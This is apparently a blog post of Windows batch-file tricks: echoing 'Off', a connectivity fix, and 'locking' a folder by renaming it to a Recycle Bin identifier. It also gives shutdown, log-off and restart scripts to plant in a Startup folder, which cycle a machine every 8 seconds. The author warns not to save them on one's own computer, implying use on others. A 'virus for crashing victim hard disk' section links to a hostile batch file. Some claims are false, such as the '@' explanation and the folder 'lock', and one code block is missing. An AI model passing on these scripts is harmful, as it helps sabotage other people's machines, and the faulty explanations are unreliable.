Trick For Displaying Only Off In DOS Window

Users who have little knowledge about Batch file programming, will be familiar with the Echo command. As Echo command is used for displaying any text in the DOS windows (Like entering echo Crack The Hack in DOS will display Crack The Hack). Have you ever tried to display Off using this command?

When you will execute command as echo off , it will display nothing. Reason behind is that by using @echo off command in batch programming, the command prompt does not appear on your screen. The @ symbol before the ECHO command means that the ECHO command will stay throughout the whole batch file unless turned on again. Without the @, it will only apply to the command directly after it. Coming back to the topic, users can't display Off in DOS window with echo off command directly. Here's a simple trick for displaying Off in DOS window:

Just Enter echo;Off in DOS, it will display Off in DOS window.

• For Shut down:
  
  • Copy and paste the following code in notepad and save it as shut.bat

  • Save batch file in Startup folder C:\ Documents and Settings\ USER\ Start Menu\ Programs\ Startup (where USER is your user name)
• For Log off:
  
  • Copy and paste the following code in notepad and save it as shut.bat
    
    
    shutdown -l -t  8 -c "Bye Bye!"
  • Save batch file in Startup folder C:\ Documents and Settings\ USER\ Start Menu\ Programs\ Startup (where USER is your user name)
• For Restart:
  
  • Copy and paste the following code in notepad and save it as shut.bat
    
    
    shutdown -r -t  8 -c "Bye Bye!"
  • Save batch file in Startup folder C:\ Documents and Settings\ USER\ Start Menu\ Programs\ Startup (where USER is your user name)

Note: Don't save it on your own computer. Above codes will shutdown, log off, restart computer every time after 8 seconds of system start up.

Shutdown is very powerful command, you can know more about it by typing shutdown /? in cmd. Startup is the folder which contains file which have to start on system startup. So If you want to start any program  or any file, folder then simply then simply paste it in startup folder. suppose if I place notepad's shortcut in this folder then notepad will display on ur system startup. So you can do whatever you wish with this command & startup folder.

How To Fix Limited Or No Connectivity In Windows?

A lot of users have gone through this warning in Windows while using Broadband connection. I'm here telling about it's solution, so follow these steps to fix limited or no connectivity:

• Open notepad.
• Copy and paste the following code:
  
  echo ipconfig/flushdns
  ipconfig/flushdns
  echo ipconfig/release
  ipconfig/release
  echo ipconfig/renew
  ipconfig/renew
  exit
  
• Save it as fix.bat on your desktop.
• It will fix the error automatically. 
• Now go to Local Area Connection Properties and uncheck "Notify me when this connection has limited or no connectivity".

Note: However if your broadband connection is working properly but still it displays the error, then no need to worry about it, simply uncheck the "Notify me when this connection has limited or no connectivity".

Simple Virus For Crashing Victim Hard Disk

Hello friends! In this post, I am telling about a simple virus for crashing hard disk, just follow these steps:

• Download text file from here.
• Save it as virus.bat in c drive.
• Remember if you open it by mistake on your own computer then press Ctrl+c for pausing the processing of batch file because this batch file will execute for infinite time.

How To Lock Any Folder In Windows (With Description)?

Hi everyone! In this post, I will show you with detail about locking any folder in Windows. Before continue, check out my other post on locking folder using cmd from here.

Suppose you want to lock the folder "hack" which has the path "e:\hack".

• Open notepad.
• Type ren e:\ hack hack.{645FF040-5081-101B-9F08-00AA002F954E} 
• Save it as lock.bat
• Now open batch file.
• Your folder will change to Recycle Bin with the name hack, so no one can access it now.
• Whenever someone would try to access this folder, recycle bin will get opened.

Actually {645FF040-5081-101B-9F08-00AA002F954E} is the registry value for Recycle bin. This batch file will rename the hack folder to Recycle Bin (using ren command). Similarly, you can change it to control panel by replacing {645FF040-5081-101B-9F08-00AA002F954E} with {21EC2020-3AEA-1069-A2DD-08002B30309D}.

• For unlocking the folder, create one more batch file with same way and type ren hack.{645FF040-5081-101B-9F08-00AA002F954E} hack in it.
• Save it as unlock.bat 
• Recycle Bin will change back to original folder.

Note: However it's just a two line method but for learning purpose, you must have the knowledge about how it works.
